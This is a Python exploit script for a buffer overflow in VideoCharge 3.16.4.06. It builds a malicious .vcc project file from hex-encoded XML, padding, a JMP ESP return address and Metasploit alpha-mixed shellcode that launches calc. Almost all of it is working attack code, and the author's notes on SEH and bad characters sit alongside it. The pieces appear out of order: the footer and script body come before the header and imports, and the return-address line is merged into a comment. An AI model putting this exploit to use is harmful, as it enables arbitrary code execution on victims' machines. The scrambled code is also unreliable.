"\x0d\x0a\x3c\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x3e\x0d\x0a\x3c\x2f"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x52\x6f\x6f\x74\x5f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69"
"\x76\x65\x46\x72\x61\x6d\x65\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73"
"\x65\x72\x74\x45\x76\x65\x72\x79\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x32\x35\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65"
"\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73\x65\x72\x74\x45\x76\x65\x72"
"\x79\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x77\x65"
"\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x52\x6f\x6f\x74\x5f"
"\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x3e"
"\x0d\x0a\x3c\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69\x6c"
"\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69"
"\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62\x6e"
"\x61\x69\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d"
"\x62\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f"
"\x6e\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x46\x69\x6c\x65\x46\x6f\x72\x6d\x61\x74"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x7b\x31\x41\x44\x43\x33\x33\x42"
"\x39\x2d\x35\x39\x36\x44\x2d\x34\x33\x30\x43\x2d\x42\x35\x39\x41"
"\x2d\x36\x44\x37\x37\x41\x42\x43\x42\x35\x46\x44\x39\x7d\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x37\x32\x27\x3e\x0d\x0a\x3c\x47\x49\x46"
"\x41\x3e\x0d\x0a\x3c\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x50\x61\x6c"
"\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f"
"\x72\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x38\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x73"
"\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x3e\x0d\x0a\x3c"
"\x2f\x50\x61\x6c\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c"
"\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x3c\x46\x72\x61"
"\x6d\x65\x44\x65\x6c\x61\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x31"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x30\x6d\x73\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x44\x65\x6c\x61\x79"
"\x3e\x0d\x0a\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x52\x65\x70\x65\x74\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74\x52\x65\x70\x65"
"\x74\x3e\x0d\x0a\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x2f\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d"
"\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61"
"\x6d\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75"
"\x6e\x74\x53\x6b\x69\x70\x20\x76\x61\x6c\x75\x65\x3d\x27\x31\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43"
"\x6f\x75\x6e\x74\x53\x6b\x69\x70\x3e\x0d\x0a\x3c\x46\x72\x61\x6d"
"\x65\x50\x61\x74\x74\x65\x72\x6e\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x3b\x35\x3b\x37\x3b\x32\x35\x3b\x33\x32\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x50"
"\x61\x74\x74\x65\x72\x6e\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x53\x6f\x75\x72\x63\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d"
"\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x46\x72\x61"
"\x6d\x65\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74"
"\x46\x72\x61\x6d\x65\x73\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f"
"\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x3e\x0d"
"\x0a\x3c\x2f\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74"
"\x65\x72\x73\x3e\x0d\x0a\x3c\x53\x69\x7a\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x26\x6c\x74\x3b\x73\x6f\x75\x72\x63\x65\x26\x67\x74"
"\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x72\x69\x67\x69"
"\x6e\x61\x6c\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4f\x72\x69\x67\x69\x6e\x61\x6c\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x3e\x0d\x0a"
"\x3c\x2f\x53\x69\x7a\x65\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x44"
"\x65\x70\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x35\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f"
"\x72\x44\x65\x70\x74\x68\x3e\x0d\x0a\x3c\x43\x72\x6f\x70\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x26\x6c\x74\x3b\x6e\x6f\x6e\x65\x26\x67"
"\x74\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c"
"\x2f\x43\x72\x6f\x70\x3e\x0d\x0a\x3c\x57\x61\x74\x65\x72\x4d\x61"
"\x72\x6b\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x57\x61\x74\x65\x72\x4d"
"\x61\x72\x6b\x3e\x0d\x0a\x3c\x46\x69\x6c\x74\x65\x72\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x69\x6c\x74\x65\x72\x73\x3e\x0d\x0a\x3c"
"\x2f\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f\x47"
"\x49\x46\x41\x3e\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x46\x69"
"\x6c\x65\x46\x6f\x72\x6d\x61\x74\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b"
"\x44\x69\x72\x73\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b\x44\x69\x72\x45"
"\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x73\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d"
"\x0a\x3c\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65"
"\x72\x6e\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61"
"\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62"
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize = 1000
payload = "\x41" * 230
# JMP ESP [urlmon.dll]payload += struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x69\x78" +
"\x4d\x59\x37\x70\x63\x30\x55\x50\x51\x70\x6b\x39\x38\x65" +
"\x76\x51\x38\x52\x73\x54\x4e\x6b\x32\x72\x46\x50\x6c\x4b" +
"\x43\x62\x74\x4c\x6c\x4b\x32\x72\x74\x54\x6c\x4b\x74\x32" +
"\x37\x58\x56\x6f\x4f\x47\x52\x6a\x65\x76\x66\x51\x49\x6f" +
"\x36\x51\x39\x50\x4e\x4c\x37\x4c\x35\x31\x43\x4c\x57\x72" +
"\x56\x4c\x61\x30\x4f\x31\x4a\x6f\x46\x6d\x67\x71\x68\x47" +
"\x6d\x32\x68\x70\x43\x62\x53\x67\x6e\x6b\x56\x32\x62\x30" +
"\x4e\x6b\x72\x62\x55\x6c\x45\x51\x6e\x30\x4e\x6b\x61\x50" +
"\x70\x78\x6b\x35\x6f\x30\x63\x44\x63\x7a\x33\x31\x6a\x70" +
"\x70\x50\x4c\x4b\x62\x68\x65\x48\x6c\x4b\x33\x68\x37\x50" +
"\x47\x71\x39\x43\x6b\x53\x35\x6c\x77\x39\x4c\x4b\x34\x74" +
"\x6e\x6b\x73\x31\x6a\x76\x50\x31\x49\x6f\x55\x61\x4b\x70" +
"\x6e\x4c\x69\x51\x5a\x6f\x74\x4d\x56\x61\x5a\x67\x35\x68" +
"\x6b\x50\x33\x45\x38\x74\x57\x73\x33\x4d\x59\x68\x75\x6b" +
"\x31\x6d\x34\x64\x44\x35\x4b\x52\x31\x48\x4c\x4b\x46\x38" +
"\x65\x74\x77\x71\x6a\x73\x35\x36\x6e\x6b\x56\x6c\x30\x4b" +
"\x4c\x4b\x62\x78\x77\x6c\x35\x51\x59\x43\x6c\x4b\x33\x34" +
"\x4c\x4b\x73\x31\x6e\x30\x6b\x39\x72\x64\x44\x64\x75\x74" +
"\x43\x6b\x51\x4b\x65\x31\x52\x79\x62\x7a\x53\x61\x6b\x4f" +
"\x69\x70\x56\x38\x33\x6f\x73\x6a\x4c\x4b\x64\x52\x38\x6b" +
"\x6b\x36\x43\x6d\x51\x7a\x63\x31\x6c\x4d\x6c\x45\x68\x39" +
"\x57\x70\x47\x70\x45\x50\x32\x70\x55\x38\x54\x71\x4e\x6b" +
"\x50\x6f\x6f\x77\x4b\x4f\x59\x45\x6f\x4b\x58\x70\x6c\x75" +
"\x4f\x52\x43\x66\x70\x68\x6e\x46\x6e\x75\x6f\x4d\x4f\x6d" +
"\x4b\x4f\x59\x45\x75\x6c\x47\x76\x33\x4c\x55\x5a\x4d\x50" +
"\x6b\x4b\x59\x70\x64\x35\x73\x35\x6f\x4b\x73\x77\x35\x43" +
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload += "\x41" * (buffersize - len(payload))
sploit = header + payload + footer
print "[*] Creating .vcc file"
try:
print "[+]Creating Exploit File...\n"
file = open("noname1.vcc","wb")
file.write(sploit)
file.close
print "[+]File noname1.vcc create successfully.\n"
except:
print "**[-]Error: #{$!}\n"
#!/usr/bin/python
# Exploit Title: VideoCharge v3.16.4.06
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com
# Version: 3.16.4.06
# Tested on: Win XP3
# Software link: http://www.softpedia.com/dyn-postdownload.php/36f0ea5a24f3=
f5f49eb4e12a379b1874/554f2748/a3a/0/1
# Greetz: b33f,corelan,offsec,vulnhub,HUST510, packetstorm
#
# Notes: Copy the file created by the script into the videocharge folder
# All third party modules are SAFESEH'ed
# A bigger buffer of > 1000 & <3000 A's will also crash the program =
but you'd have to
# use the SEH route which will make for a good exercise since the pr=
ogram only
# ascii printable x-ters and 5c (retn) is a bad x-ter (no push[reg]+=
ret, jmp[reg] or call[reg] )
#
import struct
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
"\x61\x69\x6e\x3e\x0d\x0a\x3c\x56\x45\x52\x53\x49\x4f\x4e\x20\x63"
"\x75\x72\x76\x65\x72\x3d\x22\x33\x2e\x31\x36\x2e\x34\x2e\x30\x36"
"\x22\x2f\x3e\x3c\x46\x49\x4c\x45\x53\x3e\x0d\x0a\x3c\x50\x61\x74"
"\x68\x54\x6f\x4d\x65\x64\x69\x61\x46\x69\x6c\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x43\x3a\x5c\x50\x65\x61\x63\x68\x5c\x73\x61\x6d"
"\x70\x6c\x65\x5f\x6d\x70\x34\x27\x20\x74\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x3e"
"\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62\x6e\x61"
"\x69\x6c\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62"
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52"
"\x4d\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32"
"\x64\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f"
"\x46\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x63\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f"
"\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74\x65\x72\x6e\x4e\x61\x6d"
"\x65\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x46\x6f\x6c\x64\x65"
"\x72\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x46\x6f"
"\x6c\x64\x65\x72\x3e\x0d\x0a\x3c\x53\x6b\x69\x70\x52\x61\x6e\x67"
"\x65\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x6b\x69\x70\x52\x61\x6e\x67\x65"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x49\x74\x65"
"\x6d\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x49\x74\x65\x6d"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x41\x75\x64\x69\x6f\x53\x74\x72"
"\x65\x61\x6d\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x41\x75\x64\x69\x6f"
"\x53\x74\x72\x65\x61\x6d\x3e\x0d\x0a\x3c\x49\x6e\x63\x6c\x75\x64"
"\x65\x43\x68\x61\x70\x74\x65\x72\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x49\x6e\x63\x6c\x75\x64\x65\x43\x68\x61\x70\x74\x65\x72\x3e\x0d"
"\x0a\x3c\x55\x73\x65\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x73\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x55\x73\x65\x53\x75\x62\x46\x6f\x6c"
"\x64\x65\x72\x73\x3e\x0d\x0a\x3c\x2f\x50\x61\x74\x68\x54\x6f\x4d"
"\x65\x64\x69\x61\x46\x69\x6c\x65\x3e\x0d\x0a\x3c\x2f\x46\x49\x4c"
"\x45\x53\x3e\x0d\x0a\x3c\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x4d\x6f\x64\x65\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x75"
"\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e\x61\x6d\x65\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x44\x65\x73\x74\x69\x6e\x61\x74\x69"
"\x6f\x6e\x50\x61\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x44\x65\x73"
"\x74\x69\x6e\x61\x74\x69\x6f\x6e\x50\x61\x74\x68\x3e\x0d\x0a\x3c"
"\x46\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x73\x5f\x63\x6f\x70\x79\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x79"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
